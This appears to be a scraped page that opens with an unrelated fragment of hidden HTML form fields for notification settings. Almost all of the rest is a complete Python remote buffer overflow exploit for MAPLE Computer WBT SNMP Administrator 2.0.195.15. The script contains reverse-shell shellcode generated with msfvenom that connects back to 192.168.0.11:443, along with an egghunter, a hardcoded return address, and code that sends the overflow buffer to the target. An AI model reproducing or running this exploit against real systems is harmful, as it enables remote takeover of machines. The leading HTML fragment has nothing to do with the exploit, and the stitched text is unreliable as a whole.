    <input type="hidden" name="notifyButton_color_badge_border" value="" />
    <input type="hidden" name="notifyButton_color_pulse" value="" />
    <input type="hidden" name="notifyButton_color_popup_button_background" value="" />
    <input type="hidden" name="notifyButton_color_popup_button_background_hover" value="" />
    <input type="hidden" name="notifyButton_color_popup_button_background_active" value="" />
    <input type="hidden" name="notifyButton_color_popup_button_color" value="" />
    <input type="hidden" name="notifyButton_message_prenotify" value="" />
    <input type="hidden" name="notifyButton_tip_state_unsubscribed" value="" />
    <input type="hidden" name="notifyButton_tip_state_subscribed" value="" />
    <input type="hidden" name="notifyButton_tip_state_blocked" value="" />
    <input type="hidden" name="notifyButton_message_action_subscribed" value="" />
    <input type="hidden" name="notifyButton_message_action_resubscribed" value="" />
    <input type="hidden" name="notifyButton_message_action_unsubscribed" value="" />
    <input type="hidden" name="notifyButton_dialog_main_title" value="" />
    <input type="hidden" name="notifyButton_dialog_main_button_subscribe" value="" />
    <input type="hidden" name="notifyButton_dialog_main_button_unsubscribe" value="" />
    <input type="hidden" name="notifyButton_dialog_blocked_title" value="" />
    <input type="hidden" name="notifyButton_dialog_blocked_message" value="" />
    <input type="hidden" name="prompt_customize_enable" value="true" />
    <input type="hidden" name="prompt_action_message" value="" />
    <input type="hidden" name="prompt_auto_accept_title" value="" />
    <input type="hidden" name="prompt_site_name" value="" />
    <input type="hidden" name="prompt_example_notification_title_desktop" value="" />
    <input type="hidden" name="prompt_example_notification_message_desktop" value="" />
    <input type="hidden" name="prompt_example_notification_title_mobile" value="" />
    <input type="hidden" name="prompt_example_notification_message_mobile" value="" />
    <input type="hidden" name="prompt_example_notification_caption" value="" />
    <input type="hidden" name="prompt_accept_button_text" value="" />
    <input type="hidden" name="prompt_cancel_button_text" value="" />
    <input type="hidden" name="send_welcome_notification" value="true" />
    <input type="hidden" name="welcome_notification_title" value="" />
    <input type="hidden" name="welcome_notification_message" value="" />
    <input type="hidden" name="welcome_notification_url" value="" />
    <input type="hidden" name="notification_on_post" value="true" />
    <input type="hidden" name="utm_additional_url_params" value="" />
    <input type="hidden" name="allowed_custom_post_types" value="" />
    <input type="hidden" name="custom_manifest_url" value="" />
    <input type="hidden" name="show_notification_send_status_message" value="true" />
    <input type="submit" value="Send" />
  </form>
</body>
</html>
-
MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
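#!/usr/bin/python
# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
# Author: sasaga92
# Discovery Date: 2019-07-18
# Vendor Homepage: www.computerlab.com
# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
# Tested on OS: Windows XP SP2 x86
# CVE: N/A
# [+] Credits: John Page (aka hyp3rlinx)
#
# Usage: python exploit.py [host] [port]   (defaults: 192.168.0.12 987)
# Runs under Python 2 and 3: all payload pieces are bytes, the filler produced by
# pattern_create() is encoded before being concatenated.

import random
import socket
import string
import struct
import sys

HOST = "192.168.0.12"
PORT = 987

# Buffer layout (offsets from the start of the request):
#   [0, PADDING - 8 - len(SHELLCODE))  'A' filler
#   ... up to PADDING (642144)          TAG ("w00tw00t") followed by SHELLCODE
#   [PADDING, PADDING + 32)             EGGHUNTER
#   [PADDING + 32, OFFSET_EIP)          'B' filler
#   [OFFSET_EIP, OFFSET_EIP + 4)        EIP -> call ebx
OFFSET_EIP = 642200
PADDING = 642144

# call ebx @ 0x5AD778C3 (address from the original; XP SP2 x86 only, not ASLR-safe).
EIP = b"\xc3\x78\xd7\x5a"

# Egg searched for by the egghunter ("w00t" twice, so a partial hit on the
# hunter's own immediate does not count).
TAG = b"w00tw00t"

# msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c
SHELLCODE = (
    b"\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    b"\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d"
    b"\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70"
    b"\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44"
    b"\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f"
    b"\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59"
    b"\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42"
    b"\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e"
    b"\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51"
    b"\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53"
    b"\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b"
    b"\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34"
    b"\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63"
    b"\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50"
    b"\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b"
    b"\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e"
    b"\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44"
    b"\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b"
    b"\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b"
    b"\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52"
    b"\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c"
    b"\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e"
    b"\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64"
    b"\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e"
    b"\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b"
    b"\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72"
    b"\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70"
    b"\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a"
    b"\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45"
    b"\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46"
    b"\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57"
    b"\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31"
    b"\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f"
    b"\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75"
    b"\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70"
    b"\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78"
    b"\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36"
    b"\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49"
    b"\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58"
    b"\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70"
    b"\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55"
    b"\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a"
    b"\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65"
    b"\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79"
    b"\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31"
    b"\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37"
    b"\x70\x73\x63\x69\x6f\x59\x45\x41\x41"
)

# 32-byte egghunter: scans memory for the "w00t" immediate (0x74303077) twice in a
# row and jumps past it, i.e. to SHELLCODE.
EGGHUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
    b"\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7"
    b"\xff\xe7"
)


def pattern_create(_type, _length):
    """Return a filler string of `_length` characters.

    `_type` is a space-separated spec:
      "trash X"  -> the character X repeated
      "random"   -> random lowercase letters
      "pattern"  -> Metasploit-style cyclic pattern (Aa0Aa1Aa2...)
    Any other spec returns the literal string "Not Found" (kept for
    compatibility with the original).
    """
    spec = _type.split(" ")
    kind = spec[0]
    if kind == "trash":
        return spec[1] * _length
    if kind == "random":
        return ''.join(random.choice(string.ascii_lowercase) for _ in range(_length))
    if kind == "pattern":
        out = ''
        parts = ['A', 'a', '0']
        # `<` rather than `!=`: a zero or negative length returns '' instead
        # of looping forever.
        while len(out) < _length:
            out += parts[len(out) % 3]
            if len(out) % 3 == 0:
                parts[2] = chr(ord(parts[2]) + 1)
                if parts[2] > '9':
                    parts[2] = '0'
                    parts[1] = chr(ord(parts[1]) + 1)
                    if parts[1] > 'z':
                        parts[1] = 'a'
                        parts[0] = chr(ord(parts[0]) + 1)
                        if parts[0] > 'Z':
                            parts[0] = 'A'
        return out
    return "Not Found"


def build_payload():
    """Assemble the overflow request according to the layout described above."""
    inject = pattern_create("trash A", PADDING - len(TAG) - len(SHELLCODE)).encode("latin-1")
    inject += TAG
    inject += SHELLCODE
    inject += EGGHUNTER
    inject += pattern_create("trash B", OFFSET_EIP - len(inject)).encode("latin-1")
    inject += EIP
    return inject


def pwned(_host, _port, _payload):
    """Connect to the SnmpAdm listener and deliver `_payload` (bytes) terminated by CRLF CRLF.

    Uses sendall() because send() may write only part of a ~640 KB buffer, and
    actually shuts down and closes the socket: the original referenced
    `s.shutdown` and `s.close` without calling them, so nothing was ever closed.
    """
    print("[*] Conectandose a {0}:{1}...".format(_host, _port))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.settimeout(10)
        s.connect((_host, _port))
        print("[*] Conectado, Enviando payload {0} bytes...".format(len(_payload)))
        _payload = _payload + b"\r\n\r\n"
        s.sendall(_payload)
        try:
            _data = s.recv(1024)
        except socket.error:
            _data = b""  # a reset or timeout is the expected result of a crashed service
        try:
            s.shutdown(socket.SHUT_RDWR)
        except socket.error:
            pass  # peer already gone
    finally:
        s.close()
    print('Recibido:', repr(_data))
    print("[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload)))


def main(argv=None):
    """Build the request and send it to HOST:PORT (override with argv[1] / argv[2])."""
    argv = sys.argv if argv is None else argv
    host = argv[1] if len(argv) > 1 else HOST
    port = int(argv[2]) if len(argv) > 2 else PORT
    inject = build_payload()
    # The original printed the entire 640 KB buffer to the terminal; the size is
    # the only useful part of that output.
    print("[*] Payload: {0} bytes".format(len(inject)))
    pwned(host, port, inject)


if __name__ == "__main__":
    main()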